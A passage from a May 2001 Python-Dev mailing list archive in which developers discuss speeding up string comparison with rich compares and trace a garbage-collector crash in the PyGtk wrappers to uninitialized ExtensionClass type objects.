		if (a->ob_size == 0)
			goto True;

		if (a->ob_sval[0] != b->ob_sval[0])
			goto False;

		if (memcmp(a->ob_sval, b->ob_sval, a->ob_size))
			goto False;
		else
			goto True;

we can reduce the number of function calls.
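The control flow above, written out as a self-contained function. This is a sketch only: struct str is a hypothetical stand-in for PyStringObject (just a length and a byte pointer), and the gotos become early returns.

```c
#include <string.h>

/* Hypothetical stand-in for PyStringObject: a length and the bytes. */
struct str {
    size_t size;
    const char *sval;
};

/* Py_EQ fast path: lengths first, then the empty string, then the
   first byte, and only then a full memcmp.  Returns 1 if equal. */
static int str_eq(const struct str *a, const struct str *b)
{
    if (a->size != b->size)
        return 0;
    if (a->size == 0)
        return 1;
    if (a->sval[0] != b->sval[0])
        return 0;
    return memcmp(a->sval, b->sval, a->size) == 0;
}
```

Unequal lengths, and most unequal strings of equal length, are rejected without calling memcmp at all.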

Regards,
Martin


From skip at pobox.com  Thu May 17 08:42:41 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 01:42:41 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an
ongoing thread about a segmentation violation I was getting with the new
PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
Schemenauer, I finally know what's going on and I have a simple workaround
that lets me get back to work.  Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a
PyExtensionClass struct.  It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
	PyObject_HEAD_INIT(NULL)
	0,				/* ob_size */
	"GtkTreeSortable",			/* tp_name */
	sizeof(PyPureMixinObject),	/* tp_basicsize */
	...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
normally be the address of a type object (e.g. &PyType_Type).  However, Jim
Fulton pointed out that on Windows you can't get the address of the PyType_Type
object at compile time.  Accordingly, ExtensionClass provides a
PyExtensionClass_Export macro whose responsibility is, in part, to set the
ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
will know why.  I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module
initialization function is running, but before all the ob_type fields have
been assigned their correct values.  In this case, a one-element tuple
representing the bases of a particular PyGtk extension class was traversed
by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave
it up to others to decide how, if at all, ExtensionClass should be changed
to correct the problem.

Skip


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:41:15 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:41:15 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
>    if their ob_sinterned pointers are equal and non-NULL.  So if
>    you're looking for every trick in & out of the book, that's
>    another one.

That does not help. In the entire test suite, there are 0 instances
where strings are compared which are not identical, but have equal
ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc
3, you can write

	if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of
linear control flow.
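A sketch of the identity test with the branch hint. UNLIKELY is a hypothetical macro name; it falls back to the plain condition on compilers without __builtin_expect, so the code stays portable. struct str is the same simplified stand-in for a string object, used only for illustration.

```c
#include <string.h>

/* Branch hint where GCC-style builtins exist; plain test elsewhere. */
#if defined(__GNUC__)
#  define UNLIKELY(x) __builtin_expect(!!(x), 0)
#else
#  define UNLIKELY(x) (x)
#endif

/* Hypothetical stand-in for a string object. */
struct str { size_t size; const char *sval; };

static int str_eq_fast(const struct str *a, const struct str *b)
{
    /* Identical objects are the rare case (about 5% in the counts
       quoted above), so mark the branch unlikely; the compiler may then
       move the "return 1" path out of the fall-through code. */
    if (UNLIKELY(a == b))
        return 1;
    return a->size == b->size && memcmp(a->sval, b->sval, a->size) == 0;
}
```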

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from?  That's a lot.

As far as I could trace it, most of them come from lookdict_string (at
various locations inside this function).

> > #comps:                        2949421
> > #memcmps:                       917776
> >
> > So still, ca. 30% can be decided by first byte.
> 
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.

> It's clearer that this is going to hurt sorting (& bisect etc), by
> adding yet another layer of function call to get Py_LT resolved (as
> for dict compares too, the string richcmp can't do anything to speed
> up Py_LT that string oldcmp can't do just as efficiently -- indeed,
> that's the great advantage oldcmp's "compare first character" test
> had: that *can* decide Py_LT in one byte much of the time (but
> length comparison cannot)).

So to support sorting better, I should special-case Py_LT in
string_richcompare also, to avoid the function call ?-)
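One way such a Py_LT special case might look, again on a hypothetical simplified string struct rather than CPython's: the first byte decides most cases, as in the old 3-way compare; otherwise memcmp the common prefix, and finally compare lengths. Bytes are compared as unsigned char, matching memcmp.

```c
#include <string.h>

/* Hypothetical stand-in for a string object. */
struct str { size_t size; const char *sval; };

/* Returns 1 if a < b in lexicographic byte order, else 0. */
static int str_lt(const struct str *a, const struct str *b)
{
    size_t n = a->size < b->size ? a->size : b->size;
    int c;

    if (n > 0) {
        unsigned char ca = (unsigned char)a->sval[0];
        unsigned char cb = (unsigned char)b->sval[0];
        if (ca != cb)                   /* first byte decides */
            return ca < cb;
        c = memcmp(a->sval, b->sval, n);
        if (c != 0)
            return c < 0;
    }
    return a->size < b->size;           /* equal prefix: shorter first */
}
```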

> Note too earlier mail about how adding a richcmp slot to strings will
> suddenly slow cmp(string1, string2) (which is the usual way to program a
> search tree, because cmp() *used* to call a string comparison routine only
> once; but after adding a richcmp slot, each cmp(string1, string2) will call
> the richcmp slot from 1 thru 3 times (data-dependent)).

Yes, that is a serious problem. Fortunately, very few calls in my
programs go to string_compare through cmp() now. But then, your
programs are different, of course...
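To make the "1 thru 3 times" cost concrete, here is a sketch of cmp() emulated on top of a rich-compare slot. The EQ, LT, GT probing order and all names here are assumptions for illustration; the counter only exists to show how often the slot runs for each outcome.

```c
#include <string.h>

/* Hypothetical stand-in for a string object. */
struct str { size_t size; const char *sval; };

enum cmp_op { OP_LT, OP_EQ, OP_GT };

static int rich_calls;  /* counts slot invocations, for illustration */

/* Stand-in rich-compare slot: answers one yes/no question per call. */
static int str_rich(const struct str *a, const struct str *b, enum cmp_op op)
{
    size_t n = a->size < b->size ? a->size : b->size;
    int c = memcmp(a->sval, b->sval, n);
    rich_calls++;
    if (c == 0)
        c = (a->size > b->size) - (a->size < b->size);
    switch (op) {
    case OP_LT: return c < 0;
    case OP_EQ: return c == 0;
    case OP_GT: return c > 0;
    }
    return 0;
}

/* 3-way cmp() built from the rich slot: ask EQ, then LT, then GT and
   stop at the first "true".  Equal inputs cost one slot call, "less"
   two and "greater" three, versus one call to an old tp_compare. */
static int cmp_via_rich(const struct str *a, const struct str *b)
{
    static const struct { enum cmp_op op; int outcome; } tries[] = {
        { OP_EQ, 0 }, { OP_LT, -1 }, { OP_GT, 1 },
    };
    for (size_t i = 0; i < sizeof tries / sizeof tries[0]; i++)
        if (str_rich(a, b, tries[i].op))
            return tries[i].outcome;
    return 0; /* not reached for a total order */
}
```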

Regards,
Martin


From mal at lemburg.com  Thu May 17 08:54:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 08:54:37 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B0375AD.24E039B0@lemburg.com>

skip at pobox.com wrote:
> 
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
> 
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>         PyObject_HEAD_INIT(NULL)
>         0,                              /* ob_size */
>         "GtkTreeSortable",                      /* tp_name */
>         sizeof(PyPureMixinObject),      /* tp_basicsize */
>         ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)
> 
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.

I wonder how the GC collector could "see" the type object before
it has been initialized... since PyGtkTreeSortable_Type is a static
C array and not a known PyObject until you add it to some Python
dictionary as type object or use it for creating instances, it
seems strange that the GC collector can reach out for it and
get hit by the fact that it is not yet properly initialized.

Some logic in PyExtensionClass_Export() or the GTK module must
be twisted.
 
> The workaround turns out to be exceedingly simple:
> 
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
> 
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Thu May 17 09:00:20 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 17 May 2001 09:00:20 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>

Skip wrote:
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>        PyObject_HEAD_INIT(NULL)
>        0, /* ob_size */
>        "GtkTreeSortable", /* tp_name */
>        sizeof(PyPureMixinObject), /* tp_basicsize */
>        ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time. Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime

footnote: this is usually done in the module init function, *before*
the call to Py_InitModule.  see:

    http://www.python.org/doc/FAQ.html#3.24

if the garbage collector can run after Python calls a module's init-
function, but before that module calls back into Python, anything
can happen...

Cheers /F


From skip at pobox.com  Thu May 17 09:04:06 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:04:06 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
In-Reply-To: <3B0375AD.24E039B0@lemburg.com>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<3B0375AD.24E039B0@lemburg.com>
Message-ID: <15107.30694.131193.989215@beluga.mojam.com>

    mal> I wonder how the GC collector could "see" the type object before it
    mal> has been initialized... since PyGtkTreeSortable_Type is a static C
    mal> array and not a known PyObject until you add it to some Python
    mal> dictionary as type object or use it for creating instances, it
    mal> seems strange that the GC collector can reach out for it and get
    mal> hit by the fact that it is not yet properly initialized.

It is actually PyGtkWidget_Type that is not yet initialized when it is
placed in the bases tuple for one of its subclasses.  GC traverses that
tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
whose ob_type field has not yet been initialized.  The actual object whose
bases tuple is being traversed is (in all the crashes I encountered),
GdkDragContext.  The registration calls could perhaps be reordered.
Currently GdkDragContext is patched up before GtkWidget, its base class.
This code is generated by James Henstridge's wrapper code generator, so
perhaps he can maintain the necessary class hierarchy relationships and
ensure that base classes are initialized before their subclasses.
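A sketch of that ordering fix, assuming a hypothetical, much-simplified type record whose ob_type stays NULL until it is fixed up at runtime. Readying a type first readies each of its bases, so a subclass never points at a base that is still uninitialized. It assumes the base graph is acyclic, as class hierarchies are.

```c
#include <stddef.h>

/* Hypothetical type record: ob_type is NULL until fixed up at
   runtime; bases is a NULL-terminated array (or NULL for none). */
struct type {
    const char *name;
    const struct type *ob_type;
    struct type **bases;
};

/* Stand-in for the metatype installed at runtime. */
static const struct type metatype = { "metatype", NULL, NULL };

/* Fix up t only after all of its bases, recursively, so no base is
   ever reachable with a NULL ob_type once t is in use. */
static void ready_type(struct type *t)
{
    if (t->ob_type != NULL)
        return;                         /* already initialized */
    for (struct type **b = t->bases; b != NULL && *b != NULL; b++)
        ready_type(*b);
    t->ob_type = &metatype;
}
```

With this, the generator could emit the registration calls in any order and still get bases fixed up first.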

Skip


From skip at pobox.com  Thu May 17 09:07:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:07:15 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <15107.30883.680397.280556@beluga.mojam.com>

    Fredrik> footnote: this is usually done in the module init function,
    Fredrik> *before* the call to Py_InitModule.  see:

    Fredrik>     http://www.python.org/doc/FAQ.html#3.24

    Fredrik> if the garbage collector can run after Python calls a module's
    Fredrik> init- function, but before that module calls back into Python,
    Fredrik> anything can happen...

Thanks for pointing that out.  Py_InitModule is indeed called before the
fixup occurs.

Skip


From mal at lemburg.com  Thu May 17 09:09:38 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:09:38 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
		<3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com>
Message-ID: <3B037932.476F475A@lemburg.com>

skip at pobox.com wrote:
> 
>     mal> I wonder how the GC collector could "see" the type object before it
>     mal> has been initialized... since PyGtkTreeSortable_Type is a static C
>     mal> array and not a known PyObject until you add it to some Python
>     mal> dictionary as type object or use it for creating instances, it
>     mal> seems strange that the GC collector can reach out for it and get
>     mal> hit by the fact that it is not yet properly initialized.
> 
> It is actually PyGtkWidget_Type that is not yet initialized when it is
> placed in the bases tuple for one of its subclasses.  GC traverses that
> tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
> whose ob_type field has not yet been initialized.  The actual object whose
> bases tuple is being traversed is (in all the crashes I encountered),
> GdkDragContext.  The ordering of the registration calls could perhaps be
> reordered.  Currently GdkDragContext is patched up before GtkWidget, its
> base class.  This code is generated by James Henstridge's wrapper code
> generator, so perhaps he can maintain the necessary class hierarchy
> relationships and insure that base classes are initialized before their
> subclasses.

Wouldn't it be easier to simply set the ob_type fields right at the
start of the initGtk() function ? This is what I do for all
my extensions and I've never seen any problems with it.
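A minimal sketch of that approach, using hypothetical miniature type structs rather than the real PyTypeObject or PyExtensionClass. The static definitions leave ob_type NULL (as PyObject_HEAD_INIT(NULL) does), and the init function patches every one of them before doing anything that could run the collector or publish the types.

```c
#include <stddef.h>

/* Hypothetical miniature of a type object header. */
struct typeobj {
    const struct typeobj *ob_type;   /* NULL in the static initializer */
    const char *tp_name;
};

/* Stands in for the metatype whose address cannot be used in a static
   initializer (e.g. because it lives in another DLL on Windows). */
static struct typeobj meta_type = { NULL, "type" };

/* Static definitions leave ob_type NULL, like PyObject_HEAD_INIT(NULL). */
static struct typeobj foo_type = { NULL, "Foo" };
static struct typeobj bar_type = { NULL, "Bar" };

/* Hypothetical module init: patch every ob_type first, before any
   call that could allocate objects, trigger GC, or expose the types. */
static void init_module(void)
{
    foo_type.ob_type = &meta_type;
    bar_type.ob_type = &meta_type;
    /* ...only now create the module and add the types to its dict. */
}
```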

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:18:23 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:18:23 +0800 (WST)
Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <Pine.LNX.4.33.0105171515140.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001 skip at pobox.com wrote:

>
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
>
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
>
>     PyExtensionClass PyGtkTreeSortable_Type = {
> 	PyObject_HEAD_INIT(NULL)
> 	0,				/* ob_size */
> 	"GtkTreeSortable",			/* tp_name */
> 	sizeof(PyPureMixinObject),	/* tp_basicsize */
> 	...
>     };
>
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)

Well, for Extension Classes, PyType_Type is not correct either.  And
because ExtensionClass is loaded at runtime, we can't set the ob_type
field in the initialiser even on Unix systems.

>
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.
>
> The workaround turns out to be exceedingly simple:
>
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
>
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

Thanks for debugging this problem Skip.  If we don't find a correct
solution to the problem, I can put the gc disable/enable calls inside the
gtk/__init__.py module.

James.


From mal at lemburg.com  Thu May 17 09:26:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:26:32 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>
Message-ID: <3B037D27.E258C363@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Since it is possible that these figures result from my specific
> > machine setup, I'd like to know what other people see on their
> > machines.
> 
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
> <wink>.

That must have been Vladimir's machine... even though I do admit
that some small reordering changes do result in speedups of
up to 10% -- probably due to the compiler accidentally creating
code which the CPU's cache management likes.
 
> My Win98SE box is *astonishingly* useless for timings.  Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
> the second time).  This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still I'm executing
the tests 10-times each and for the figures I posted, I even
ran pybench twice and only took the second readings as basis.
 
> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
> 
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute
numbers -- it's the hot-spots which showed up that scare me:
e.g. dictionary creation seems to have suffered along the way
for some reason, function calls are even slower now than they
were previously and other important tasks such as instance
creation take a similar hit (probably as a result of the other
two).

Running the same test for 2.1 vs. 2.0 there's not much to
notice, so the important changes seem to be originating in
the move from 1.5.2 to 2.0.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:33:17 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:33:17 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <Pine.LNX.4.33.0105171522400.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001, Fredrik Lundh wrote:

> footnote: this is usually done in the module init function, *before*
> the call to Py_InitModule.  see:

The PyExtensionClass_Export() function requires a pointer to the module
dictionary so that it can add itself to the module.  Unfortunately this
requires Py_InitModule to have been called beforehand.

I guess this means that the current ExtensionClass API will need to be
modified in order to allow ExtensionClasses to be initialised before
Py_InitModule.

>
>     http://www.python.org/doc/FAQ.html#3.24
>
> if the garbage collector can run after Python calls a module's init-
> function, but before that module calls back into Python, anything
> can happen...

James.


From mwh at python.net  Thu May 17 09:43:38 2001
From: mwh at python.net (Michael Hudson)
Date: 17 May 2001 08:43:38 +0100
Subject: [Python-Dev] Performance compares
In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200"
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com>
Message-ID: <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Sure are... but I'm not so much interested in the absolute numbers
> -- it's the hot-spots which showed up that scare me: e.g. dictionary
> creation seems to have suffered along the way for some reason,
> functions calls are even slower now than they were previously and
> other important tasks such a instance creation take a similar hit
> (probably as a result of the other two).

Have you tried fiddling with gc parameters?  If the GC does a multi
generation trawl through the heap in the middle of some test, that
might skew the numbers in unexpected ways.

Or not, of course.

Cheers,
M.

-- 
  CLiki pages can be edited by anybody at any time. Imagine the most
  fearsomely comprehensive legal disclaimer you have ever seen, and
  double it                        -- http://ww.telent.net/cliki/index


From mal at lemburg.com  Thu May 17 11:03:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:03:06 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B0393CA.7B0E024C@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Sure are... but I'm not so much interested in the absolute numbers
> > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > creation seems to have suffered along the way for some reason,
> > functions calls are even slower now than they were previously and
> > other important tasks such a instance creation take a similar hit
> > (probably as a result of the other two).
> 
> Have you tried fiddling with gc parameters?  If the GC does a multi
> generation trawl through the heap in the middle of some test, that
> might skew the numbers in unexpected ways.
> 
> Or not, of course.

No, I haven't tried fiddling with those. I'm not sure I want
to either ;-) ... the reason is that applications won't switch
off GC for execution and so the test is closer to real life.

Still, I'll rerun the test suite using gc.disable() and post the
results.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 17 11:18:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:18:36 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk> <3B0393CA.7B0E024C@lemburg.com>
Message-ID: <3B03976C.CF47961@lemburg.com>

"M.-A. Lemburg" wrote:
> 
> Michael Hudson wrote:
> >
> > "M.-A. Lemburg" <mal at lemburg.com> writes:
> >
> > > Sure are... but I'm not so much interested in the absolute numbers
> > > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > > creation seems to have suffered along the way for some reason,
> > > functions calls are even slower now than they were previously and
> > > other important tasks such a instance creation take a similar hit
> > > (probably as a result of the other two).
> >
> > Have you tried fiddling with gc parameters?  If the GC does a multi
> > generation trawl through the heap in the middle of some test, that
> > might skew the numbers in unexpected ways.
> >
> > Or not, of course.
> 
> No, I haven't tried fiddling with those. I'm not sure I want
> to either ;-) ... the reason is that applications won't switch
> off GC for execution and so the tests is closer to real life.
> 
> Still, I'll rerun the test suite using gc.disable() and post the
> results.

Turns out, the difference is not noticeable (< 1%).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gmcm at hypernet.com  Thu May 17 15:00:27 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Thu, 17 May 2001 09:00:27 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B03932B.8219.CCBF9F3F@localhost>

[Skip] 

> Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> It would normally be the address of a type object (e.g.
> &PyType_Type).  However, Jim Fulton pointed out that on Windows
> you can't get the address of &PyType_Type object at compile time.

This is MS being passive-aggressive. If you tell MSVC the 
source is C++, it will magically find the address of 
PyType_Type at compile time, but their language lawyers 
apparently believe the C spec disallows this. Standards
conformant and incompatible -

what-MS-calls-"win-win"-ly y'rs

- Gordon


From guido at digicool.com  Thu May 17 16:04:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 09:04:59 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200."
             <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>  
            <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

I have always thought that eventually (but long before Py3K!) all
objects would only support rich comparisons and the __cmp__ and
tp_compare slots would become completely obsolete.  I realize I
probably haven't expressed this thought clearly, and I'm not going to
push for this to happen quickly or forcefully, but it's nevertheless
how I see things.  I expect it would allow a tremendous cleanup of the
comparison code.  It will never reach the simplicity of cmp() -- but
think of Einstein's (?) rule "things should be as simple as they can
be, but no simpler."  Clearly cmp() was too simple. :-)

Anyway, it worries me whenever I hear someone express the thought that
adding rich comparisons to a particular object type would be a bad
idea because it would slow things down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 17 16:37:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:37:30 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT."
             <3B03932B.8219.CCBF9F3F@localhost> 
References: <3B03932B.8219.CCBF9F3F@localhost> 
Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com>

> [Skip] 
> 
> > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> > It would normally be the address of a type object (e.g.
> > &PyType_Type).  However, Jim Fulton pointed out that on Windows
> > you can't get the address of &PyType_Type object at compile time.
> 
> This is MS being passive-aggressive. If you tell MSVC the 
> source is C++, it will magically find the address of 
> PyType_Type at compile time, but their language lawyers 
> apparently  believe the C spec disallows this. Standards 
> conformant and incompatible -
> 
> what-MS-calls-"win-win"-ly y'rs
> 
> - Gordon

I don't think MS blames it on the language spec so much; it's probably
more that they use the spec as an excuse not to fix their
implementation.  The problem only occurs when the definition of the
symbol is in a different DLL than the reference.  This is why built-in
types like PyTuple_Type don't have this problem.  I guess for C++ they
have to do a dynamic initializer anyway, so they can make this work,
but they haven't bothered to make it work for C.

My other point is that Skip's problem is clearly a gtk bug: it
shouldn't have exposed the type before fully initializing it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From james at daa.com.au  Thu May 17 16:48:43 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 22:48:43 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com>
Message-ID: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>

On Thu, 17 May 2001, Guido van Rossum wrote:

> My other point is that Skip's problem is clearly a gtk bug: it
> shouldn't have exposed the type before fully initializing it.

On further investigation, it turned out that it was caused by a bug in my
code generator that caused one extension class to be initialised before
its base class (in fact, that particular extension class shouldn't have
had any base classes).  It was just the cyclic GC code triggering the bug.

It will be fixed in the next snapshot of pygtk for GTK+ 2.0

James.

-- 
Email: james at daa.com.au
WWW:   http://www.daa.com.au/~james/


From guido at digicool.com  Thu May 17 16:52:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:52:54 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800."
             <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
